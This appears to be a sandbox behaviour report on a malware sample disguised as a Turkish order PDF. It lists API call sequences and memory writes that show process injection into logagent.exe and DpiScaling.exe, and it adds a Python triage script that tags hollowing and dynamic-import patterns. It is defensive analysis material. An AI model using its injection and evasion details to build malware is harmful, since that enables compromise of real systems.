Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_0040728F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 3_2_0040477E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00403325
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 3_2_00412BEE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548C1E getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose, 3_2_10548C1E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10544CB4 FindFirstFileW, 3_2_10544CB4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055457D FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose, 3_2_1055457D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054610D _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread, 3_2_1054610D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546599 FindFirstFileW,FindNextFileW,FindClose, 3_2_10546599
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548EAA getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose, 3_2_10548EAA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10551F15 FindFirstFileW, 3_2_10551F15
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha 3_2_00403C4A
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310315497.00000000007A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310315497.00000000007A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpp.com
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8{%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_00409908
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_105410AC mov eax, dword ptr fs:[00000030h] 3_2_105410AC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_105410AC mov eax, dword ptr fs:[00000030h] 3_2_105410AC
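The entries above list, for each function found in the payload injected into logagent.exe, the imports it calls in the order they appear (the `3_2_` prefix is the report's process/run numbering, the same `3.2.` used in the `3.2.logagent.exe...unpack` names further down; the suffix is the function address). The order is what carries meaning: FindFirstFileW, FindNextFileW, FindClose is a directory walk; socket followed by connect is an outbound connection; a run of LoadLibraryA and GetProcAddress calls is import resolution at run time, which keeps the interesting APIs out of the import table; and `mov eax, dword ptr fs:[00000030h]` reads the PEB pointer from the 32-bit TEB, the first step of a BeingDebugged check or of walking the loader lists by hand. The Python below is an added example and is not part of this report or of any sandbox tooling: it parses lines in exactly this format, discards the MSVC-mangled std::string names (`??0?$basic_string@...`) that drown the real imports, and tags each function with the behaviour its call sequence indicates, including the CreateProcessW, GetThreadContext, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread hollowing chain that the report's `3_2_0040F219` entry shows. Tag names and thresholds are this example's own choices, and the sample lines are copied (some shortened) from this report.

```python
import re
from typing import Dict, List, Optional

# One "Code function" entry as printed in this report: an optional leading function id
# (process_run_address, e.g. 3_2_0040F219), then either a comma-separated API list or
# one disassembled instruction, then the closing function id.
_FUNC = re.compile(
    r"^Source:\s+(?P<image>.+?)\s+Code function:\s+"
    r"(?:(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s+)?(?P<body>.*?)\s*(?P<fid2>\d+_\d+_[0-9A-Fa-f]+)\s*$"
)

# RunPE / process hollowing: every step must appear in this order in the function's
# API list; unrelated calls may sit between the steps.
HOLLOWING_CHAIN = [
    {"CreateProcessA", "CreateProcessW"}, {"GetThreadContext"}, {"VirtualAllocEx"},
    {"WriteProcessMemory"}, {"SetThreadContext"}, {"ResumeThread"},
]
_LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}
_FIND_FIRST = {"FindFirstFileA", "FindFirstFileW"}
_FIND_NEXT = {"FindNextFileA", "FindNextFileW"}
_DELETE = {"DeleteFileA", "DeleteFileW", "RemoveDirectoryA", "RemoveDirectoryW"}


def parse_function(line: str) -> Optional[dict]:
    """Split one report line into image, function id, API names and raw disassembly."""
    m = _FUNC.match(line.strip())
    if not m:
        return None
    entry = {"image": m["image"], "fid": m["fid"] or m["fid2"], "apis": [], "disasm": ""}
    tokens = [t.strip() for t in m["body"].split(",") if t.strip()]
    if tokens and " " in tokens[0]:        # "mov eax" -> a disassembled instruction
        entry["disasm"] = m["body"]
    else:                                  # drop MSVC-mangled std:: names ("??0?$basic_string@...")
        entry["apis"] = [t for t in tokens if not t.startswith("?")]
    return entry


def has_ordered_chain(apis: List[str], chain: List[set]) -> bool:
    """True if every step of `chain` occurs in `apis` in the given order (subsequence test)."""
    it = iter(apis)
    return all(any(api in step for api in it) for step in chain)


def classify(entry: dict) -> List[str]:
    """Tag one parsed function with the behaviours its call sequence reveals."""
    apis, present, tags = entry["apis"], set(entry["apis"]), []
    if has_ordered_chain(apis, HOLLOWING_CHAIN):
        tags.append("process_hollowing")
    if apis.count("GetProcAddress") >= 3 and present & _LOADERS:
        tags.append("dynamic_import_resolution")
    if present & _FIND_FIRST and present & _FIND_NEXT:
        tags.append("file_enumeration")
    if present & _FIND_FIRST and present & _DELETE:
        tags.append("file_deletion_sweep")
    if {"socket", "connect"} <= present:
        tags.append("outbound_socket")
    if present & {"mouse_event", "keybd_event", "SendInput"}:
        tags.append("input_injection")
    # fs:[30h] is the PEB pointer in the 32-bit TEB. CRT and compiler-generated code
    # read it too, so on its own this is a weak signal; it is listed, not scored.
    if "fs:[00000030h]" in entry["disasm"]:
        tags.append("peb_access")
    return tags


def classify_report(lines: List[str]) -> Dict[str, List[str]]:
    """Map function id -> tags for every parsable "Code function" line."""
    result: Dict[str, List[str]] = {}
    for line in lines:
        entry = parse_function(line)
        if entry:
            result[entry["fid"]] = classify(entry)
    return result


# Sample input: lines copied from this report (the LoadLibraryA/GetProcAddress and the
# mouse_event entries shortened, the rest verbatim).
REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 3_2_00412BEE",
    r"Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054610D _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread, 3_2_1054610D",
    r"Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_00409908",
    r"Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_105410AC mov eax, dword ptr fs:[00000030h] 3_2_105410AC",
    r"Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 3_2_0040F219",
    r"Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_00410145",
]

if __name__ == "__main__":
    for fid, tags in classify_report(REPORT_LINES).items():
        print(fid, ",".join(tags) or "-")
```

Running the block over the six sample lines tags `3_2_0040F219` as process hollowing and `3_2_00409908` as dynamic import resolution, which is the pair that matters for triage: the first is the injector, the second explains why a static import table of the unpacked payload looks harmless. The subsequence test in `has_ordered_chain` is deliberate; a plain set intersection would also fire on a legitimate debugger or crash handler that calls GetThreadContext and ReadProcessMemory, but those do not resume a process they created after rewriting its memory.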

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 940000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 9D0000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 9E0000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 9F0000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: C00000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: C10000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 950000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 960000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 970000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 980000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 990000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 5F0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 880000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: C50000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 800000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 810000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 820000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 830000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 840000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 850000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 860000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 870000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 1010000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 4BA0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3060000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3070000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30C0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30D0000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 10540000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 940000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 9D0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 9E0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 9F0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: C00000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: C10000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 950000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 960000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 970000 protect: page execute and read and write Jump to behavior
